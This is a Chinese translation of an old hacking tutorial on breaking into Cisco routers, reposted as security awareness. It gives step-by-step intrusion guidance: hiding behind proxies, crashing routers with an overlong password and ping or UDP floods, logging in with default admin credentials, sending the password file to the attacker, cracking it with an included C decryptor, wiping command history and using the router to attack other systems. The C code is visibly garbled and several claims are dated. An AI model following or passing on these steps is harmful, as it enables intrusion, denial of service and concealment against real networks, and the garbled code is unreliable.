攻擊CISCO路由器, 希望大家能從中得到保護自己網絡安全的信息

邪MM

攻擊CISCO路由器\r\n\r\n原文來自BlackSun，夢醒時分翻譯。這是一篇非常好的文章，很高興能和大家共享！\r\n\r\n警告：\r\n\r\n不要用這破壞cisco系統(tǒng)，或非法訪問系統(tǒng)。這篇文章只是以學習為目的。只可以用在合法行為，不能破壞任何系統(tǒng)。這篇文章將一步一步的向你展示如何利用發(fā)現的缺陷來獲得非法訪問。如果你攻入了一個cisco路由器，或者擾亂了系統(tǒng)，將會中斷數百個網絡客戶機，造成大量損失。所以，只可以在被允許的情況下進行，否則你將會有許多麻煩！\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n目錄:\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n在你看之前需要了解的:\r\n\r\n－什么是IP地址？\r\n\r\n－什么是ISP？\r\n\r\n－什么是TCP/IP數據包？\r\n\r\n－怎樣隱藏你的IP地址？\r\n\r\n－怎樣使用Telnet？\r\n\r\n－怎樣使用HyperTerminal？\r\n\r\n－怎樣使用Ping？\r\n\r\n－怎樣使用TraceRoute？\r\n\r\n－怎樣使用代理服務器？\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n－第一段：為什么攻擊cisco路由器？\r\n\r\n－第二段：怎樣找到一個cisco路由器？\r\n\r\n－第三段：怎樣闖入一個cisco路由器？\r\n\r\n－第四段：怎樣破解密碼？\r\n\r\n－第五段：怎樣使用一個cisco路由器？\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n你看之前需要了解的知識：\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n什么是IP地址？\r\n\r\nIP是Internet Protocol的縮寫,電腦通過IP地址來識別網絡中的其它電腦，與其連接。這就是你為什么會\r\n\r\n在IRC中被踢走，并且找到你的ISP和你的大概位置。IP地址是很容易得到的，基本上可以由以下幾種方法\r\n\r\n獲得：\r\n\r\n-你訪問某網站,你的IP被記錄\r\n\r\n-在IRC中,某人得到你的IP地址\r\n\r\n-在ICQ，OICQ中,可以簡單的得到你的IP地址，使用一些小工具。\r\n\r\n-如果你的電腦和某人連接起來，運行 systat即可看到和那些電腦連接（以IP地址顯示）\r\n\r\n-某人發(fā)給你一封用java程序寫的郵件，可以得到你的IP地址\r\n\r\n還有其它許多方法得到IP地址，包括使用一些木馬和后門程序。\r\n\r\n-----------\r\n\r\n什么是ISP？\r\n\r\nISP是Internet Service Provider的縮寫,你通過它們連接到internet.你撥號后就會連接和其連接。我\r\n\r\n們可以運行一個traceroute（跟蹤路徑）來尋找我們的ISP（traceroute 在后面還會介紹). \r\n\r\n你應該看到像這樣:\r\n\r\ntracert 222.222.22.22\r\n\r\nTracing route to [221.223.24.54]\r\n\r\nover a maximum of 30 hops.\r\n\r\n1 147ms 122ms 132ms your.isp [222.222.22.21]<<<你的ISP\r\n\r\n2 122ms 143ms 123ms isp.firewall [222.222.22.20]<<references。你可以在這改變緩沖區(qū)的大小。\r\n\r\n你也可以 打開/關閉 \"local echo\"。如果你打開了\"local echo\"，你的電腦將顯示你輸入的任何東西，\r\n\r\n并且連接上的電腦將顯示回應。\r\n\r\n所以你將會看到就像這些：\r\n\r\n你輸入 \"hello\",你看到的是\r\n\r\nhhelelollo\r\n\r\n這是因為返回的信息和你輸入的內容已經混合起來了。我這樣做的唯一的原因是看連接的機器對我的輸入，\r\n\r\n是否產生回應。\r\n\r\n在默認的情況下，telnet只會通過telnet端口連接，即是斷口23。你并不會只通過端口23連接，所以你連\r\n\r\n接的時候，你可以任意改變端口。你可以改成25，那是郵件服務程序的端口。也可以是21，那是ftp的端口。\r\n\r\n總共有上千個端口，所以你要選擇正確的端口！\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n怎樣使用超級終端？\r\n\r\n超級終端可以讓你的電腦的任意端口進行監(jiān)聽某臺電腦，如果有信息來到這個端口，就可以進行傳輸件。超\r\n\r\n級終端在 開始>程序>附件>通訊 中，沒有的話，你可以通過控制面板中安裝。首先，你要選擇連接協(xié)議，我\r\n\r\n們選\"TCP/IP Winsock\"，接著輸入要連接的電腦，下面選擇端口。可以選擇Call>Wait for Call，來等待\r\n\r\n文件。這樣其它的電腦就可以通過某個端口連接上你了，你也可以聊天，或者傳送文件了。\r\n\r\n:我的超級終端可能不一樣，沒有這個功能。\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n怎樣使用Ping？\r\n\r\nPing的使用很簡單，在MS-DOS方式下，輸入“ping IP地址”，默認是ping三次，你也可以自己設定。\r\n\r\n\"ping ip地址 -t\" \r\n\r\n可以使其不停的ping。\r\n\r\n改變 ping 的大小可以這樣做:\r\n\r\n\"ping -l (size) ip.address\"\r\n\r\nping其實是向遠程的機器發(fā)送數據包，遠程的機器接收到就會把數據包原路返回，我們可以看到這個過程的\r\n\r\n時間。時間越短，速度就越快，當然，擁擠的時候，就會發(fā)生數據包丟失。 Ping 會減慢被ping的電腦的速\r\n\r\n度，流量過大的時候，甚至使其down機。一分鐘的ping攻擊就可以使一臺win98的電腦崩潰。(因為它的連接\r\n\r\n緩沖區(qū)溢出 - 連接過量，所以Windows決定休息休息了:>.ping攻擊也會占用你許多帶寬，所以你的帶寬要\r\n\r\n比目標機器大(除非目標機器運行的是Windows 98，而且你有個不錯的貓，那么一分鐘內，你就可以叫它下臺).\r\n\r\nPing攻擊對強壯的系統(tǒng)沒有效果。\r\n\r\n注意: DOS\'s -t 選項不是一個ping攻擊,它只是很小的連接一下，而且中間有很多間隔。在Unix或Linux\r\n\r\n的機器中，你可以用上參數 －f 進行真正的ping攻擊。其實，如果你的分布是POSIX-compliant (POSIX -\r\n\r\nPortable Operating System Interface based on uniX)，否則那就不是真正的Unix/Linux 分布。那\r\n\r\n么如果你有個 OS，稱自己既是Unix，又是Linux，那么就是有 －f 。\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n怎樣使用TraceRoute？\r\n\r\n要跟蹤你的連接（可以觀察到目標機器的連接路線），只要在MS-DOS方式下，輸入“tracert IP地址”。你\r\n\r\n將會看到一個電腦的目錄，就是你和目標之間通過的機器。. \r\n\r\n你可以用此方法確定是否存在防火墻，也可以確定某人的ISP(internet service provider)。\r\n\r\n要確定ISP，只要看目標機器的前一個IP地址，那就應該是ISP的路由器。\r\n\r\n基本上說，這就是traceroute怎樣工作－一個 TCP/IP 數據包，在它的頭部有一個值(在IP的頭部。如果你不\r\n\r\n知道這是什么意思，沒關系，你接著往下看就可以了)稱作 TTL,它是Time To Live的縮寫。當一個數據包通過\r\n\r\n路由器的時候，它的TTL值就會減少。這樣可能會使數據包在網絡中流竄，消耗帶寬。所以每當一個數據包TTL\r\n\r\n值達到0的時候，它就會失效并且因為一個ICMP錯誤返回到發(fā)送者�，F在traceroute 先發(fā)送一個TTL值為1的\r\n\r\n數據包，那么它很快就會返回。查看ICMP錯誤的頭部，traceroute就可以知道數據包第一步通過哪。接著就\r\n\r\n會發(fā)送TTL值為2的數據包，返回后，就是第二次通過的地方。依次下去，直到最終的目的地，就可以知道整個\r\n\r\n路徑。\r\n\r\n現在你是不是明白了呢? \r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n怎樣使用代理服務器？\r\n\r\n在網上尋找一個代理服務器，包括你需要的打開的端口的代理服務器。找到后，你可以用telnet 或\r\n\r\nhyperterminal通過代理服務器連接到另外一臺電腦上。這樣做對方的電腦就不可以確定你的IP地址。\r\n\r\n----------------------------------------------------------------------------------------------\r\n\r\n第一段：為什么攻擊cisco路由器？\r\n\r\n你可能會想.. 為什么要攻擊 cisco 路由器呢? \r\n\r\n答案就是那樣做將對闖入其它的系統(tǒng)非常有用...\r\n\r\nCisco路由器非常的快，在一個系統(tǒng)中，一些會是以18 T1連接。而且它們非常靈活，盡管大多數運行\(zhòng)r\n\r\ntelnet，但是它們可以在DoS攻擊或攻入其它系統(tǒng)時發(fā)揮作用。 \r\n\r\n它們同時還會有成千的數據包通過。但是可以被捕獲進行譯碼...許多的cisco路由器受托于系統(tǒng)，它們\r\n\r\n可以讓你獲得其網絡中訪問其它電腦的確切的數量。\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n第二段：怎樣找到一個cisco路由器？\r\n\r\n尋找一個cisco路由器可以說是以項簡單的任務，幾乎所有的ISP至少通過一個cisco路由器。最簡單的\r\n\r\n方法是在dos下運行tracert，你可以跟蹤到電腦之間的許多電腦，在這之間，必有一個 “cisco”這個\r\n\r\n名字。如果你發(fā)現了，記下它的IP地址。\r\n\r\n:在中國未必有cisco這個名字，但是肯定有路由器的，你可以用SuperScan掃描前兩個IP地址，\r\n\r\n看哪個開2001端口（Cisco路由器管理）和23端口即是的啦！\r\n\r\n現在，你有cisco路由器的位置了，但是它可能還有一個防火墻保護它，所以你要檢查一下它是否被封\r\n\r\n鎖ping連接的次數，如果有回應，它就有可能未被封鎖。另外一種方法就是試著訪問cisco路由器的一些\r\n\r\n端口。你用telnet即可，端口23，如果它要輸入密碼，未叫輸入用\r\n\r\n戶名，你就可能在一個防火墻。\r\n\r\n試著找一個未受防火墻保護的路由器，因為這篇教程主題是路由器，不是教你怎樣通過防火墻。當你確\r\n\r\n信找到一個好的系統(tǒng)，你應該找一個可以使用23端口的代理服務器，這樣你的IP地址就不會被路由器記\r\n\r\n錄下來了。:找到一臺運行Wingate的機器即可。\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n第三段：怎樣闖入一個cisco路由器？\r\n\r\nCisco路由器運行 V4.1 版本的軟件（現在普遍使用的），這很容易干掉。你只要通過代理服務器連接到\r\n\r\n一個cisco路由器，輸入一串很長的密碼，如：\r\n\r\n10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk\r\n\r\n10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk\r\n\r\n10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk\r\n\r\n10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk\r\n\r\n現在開始等，cisco系統(tǒng)將會重新啟動，可以說你已經攻擊它，使它離線了...但是過2-10分鐘，它就會\r\n\r\n恢復，我們應該進入它。\r\n\r\n如果什么都沒發(fā)生,那么它運行的不是脆弱的軟件,你可以多試幾種DoS攻擊，比如大量的 ping.到dos下，\r\n\r\n輸入 \"ping -l 56550 cisco.router.ip -t\",這會起到同樣的效果. \r\n\r\n:很有可能以上兩種方法都不行，反正是要其down機，那么試試那個攻擊yahoo的udpFlood，一定\r\n\r\n可以使其down機。一定要注意小心�。∥蚁嘈拍銘�該知道該怎么保護自己。\r\n\r\n如果它被動結,就另找一個代理服務器進行連接。并且用戶名為\"admin\"，密碼為\"admin\"，因為這是默認的。\r\n\r\n因為當它暫時的disabled，它將恢復到默認狀態(tài)。\r\n\r\n:你到我主頁，會有一篇文章包括幾乎所有的路由器的默認用戶名和密碼。\r\n\r\n現在，你已經進入了，你應該獲得密碼文件！系統(tǒng)運行不同的軟件，但大部分有個像\"htl-textil\"\r\n\r\n這類的提示，現在輸入\"?\"，觀看命。你會看到有很多的命令，你會發(fā)現一個傳送命令，用這個命令，在當前Admin用戶的情況下，把密碼文件發(fā)送到你的電腦23端口上。但是在這之前，你要把你的超級終端設定好。你發(fā)送文件之后，超級終端將問你是否接收文件，你選擇是并保存在電腦中即可。離線. 你通過了最難的部分，下面準備開始破解密碼。\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n第四段：怎樣破解密碼？\r\n\r\n現在，你獲得了密碼文件，你要破解它才能繼續(xù)進入路由器。所以你可以運行John the Ripper之類的軟件破譯它。\r\n\r\n這是我推薦的最簡單的方法.另一種方法是試著把它解碼。這樣做需要一個解碼軟件，使用某些解碼軟件，你還要有足夠的耐心。\r\n\r\n這兒有一個專門為cisco路由器密碼文件解碼的軟件，你可以在Linux中編譯它:\r\n\r\n#include \r\n\r\n#include \r\n\r\nchar xlat[] = {\r\n\r\n0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,\r\n\r\n0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,\r\n\r\n0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44\r\n\r\n};\r\n\r\nchar pw_str1[] = \"password 7 \";\r\n\r\nchar pw_str2[] = \"enable-password 7 \";\r\n\r\nchar *pname;\r\n\r\ncdecrypt(enc_pw, dec_pw)\r\n\r\nchar *enc_pw;\r\n\r\nchar *dec_pw;\r\n\r\n{\r\n\r\nunsigned int seed, i, val = 0;\r\n\r\nif(strlen(enc_pw) & 1)\r\n\r\nreturn(-1);\r\n\r\nseed = (enc_pw[0] - ?\') * 10 + enc_pw[1] - ?\'\r\n\r\nif (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))\r\n\r\nreturn(-1);\r\n\r\nfor (i = 2 ; i <= strlen(enc_pw); i++) {\r\n\r\nif(i !=2 && !(i & 1)) {\r\n\r\ndec_pw[i / 2 - 2] = val ^ xlat[seed++];\r\n\r\nval = 0;\r\n\r\n}\r\n\r\nval *= 16;\r\n\r\nif(isdigit(enc_pw = toupper(enc_pw))) {\r\n\r\nval += enc_pw - ?\'\r\n\r\ncontinue;\r\n\r\n}\r\n\r\nif(enc_pw >= \'A\' && enc_pw <= \'F\') {\r\n\r\nval += enc_pw - \'A\' + 10;\r\n\r\ncontinue;\r\n\r\n}\r\n\r\nif(strlen(enc_pw) != i)\r\n\r\nreturn(-1);\r\n\r\n}\r\n\r\ndec_pw[++i / 2] = 0;\r\n\r\nreturn(0);\r\n\r\n}\r\n\r\nusage()\r\n\r\n{\r\n\r\nfprintf(stdout, \"Usage: %s -p \\n\", pname);\r\n\r\nfprintf(stdout, \" %s \\n\", pname);\r\n\r\nreturn(0);\r\n\r\n}\r\n\r\nmain(argc,argv)\r\n\r\nint argc;\r\n\r\nchar **argv;\r\n\r\n{\r\n\r\nFILE *in = stdin, *out = stdout;\r\n\r\nchar line[257];\r\n\r\nchar passwd[65];\r\n\r\nunsigned int i, pw_pos;\r\n\r\npname = argv[0];\r\n\r\nif(argc > 1)\r\n\r\n{\r\n\r\nif(argc > 3) {\r\n\r\nusage();\r\n\r\nexit(1);\r\n\r\n}\r\n\r\nif(argv[1][0] == \'-\')\r\n\r\n{\r\n\r\nswitch(argv[1][1]) {\r\n\r\ncase \'h\':\r\n\r\nusage();\r\n\r\nbreak;\r\n\r\ncase \'p\':\r\n\r\nif(cdecrypt(argv[2], passwd)) {\r\n\r\nfprintf(stderr, \"Error.\\n\";\r\n\r\nexit(1);\r\n\r\n}\r\n\r\nfprintf(stdout, \"password: %s\\n\", passwd);\r\n\r\nbreak;\r\n\r\ndefault:\r\n\r\nfprintf(stderr, \"%s: unknow option.\", pname);\r\n\r\n}\r\n\r\nreturn(0);\r\n\r\n}\r\n\r\nif((in = fopen(argv[1], \"rt\") == NULL)\r\n\r\nexit(1);\r\n\r\nif(argc > 2)\r\n\r\nif((out = fopen(argv[2], \"wt\") == NULL)\r\n\r\nexit(1);\r\n\r\n}\r\n\r\nwhile(1) {\r\n\r\nfor(i = 0; i < 256; i++) {\r\n\r\nif((line = fgetc(in)) == EOF) {\r\n\r\nif(i)\r\n\r\nbreak;\r\n\r\nfclose(in);\r\n\r\nfclose(out);\r\n\r\nreturn(0);\r\n\r\n}\r\n\r\nif(line == \'\\r\')\r\n\r\ni--;\r\n\r\nif(line == \'\\n\')\r\n\r\nbreak;\r\n\r\n}\r\n\r\npw_pos = 0;\r\n\r\nline = 0;\r\n\r\nif(!strncmp(line, pw_str1, strlen(pw_str1)))\r\n\r\npw_pos = strlen(pw_str1);\r\n\r\nif(!strncmp(line, pw_str2, strlen(pw_str2)))\r\n\r\npw_pos = strlen(pw_str2);\r\n\r\nif(!pw_pos) {\r\n\r\nfprintf(stdout, \"%s\\n\", line);\r\n\r\ncontinue;\r\n\r\n}\r\n\r\nif(cdecrypt(&line[pw_pos], passwd)) {\r\n\r\nfprintf(stderr, \"Error.\\n\";\r\n\r\nexit(1);\r\n\r\n}\r\n\r\nelse {\r\n\r\nif(pw_pos == strlen(pw_str1))\r\n\r\nfprintf(out, \"%s\", pw_str1);\r\n\r\nelse\r\n\r\nfprintf(out, \"%s\", pw_str2);\r\n\r\nfprintf(out, \"%s\\n\", passwd);\r\n\r\n}\r\n\r\n}\r\n\r\n}\r\n\r\n如果你沒有使用Linux，你就只好用John the Ripper之類的軟件，帶上密碼檔，進行暴利破解。\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\n第五段：怎樣使用一個cisco路由器？\r\n\r\n要使用它，你先必須連接到它，你可以用代理，以免你的IP地址被記下。當你進入的時候，如果你想關閉\r\n\r\n歷史記錄來掩蓋你的行為，你只要輸入\"terminal history size 0\"。這樣就不會被記下什么了! 輸入 \"?\"\r\n\r\n來看路由器中的命令，大多數你都可以用的。 \r\n\r\n這些路由器一般都有telnet，所以你可以通過telnet連接到其它的系統(tǒng)上(比如unix boxes)，并且攻擊\r\n\r\n它們。你還可以使用ping 和 traceroute 進行跟蹤系統(tǒng)或進行DoS攻擊。你也可以監(jiān)聽數據包，但我不推薦\r\n\r\n這樣做，因為并不是一定成功，而且會被發(fā)現....\r\n如果你第一次沒有攻入cisco，不要擔心...你一兩次是不可能成功的。它需要不斷的練習和超強的耐力。\r\n\r\n這兒只向你將怎樣做...一定要在合法的情況下進行�。�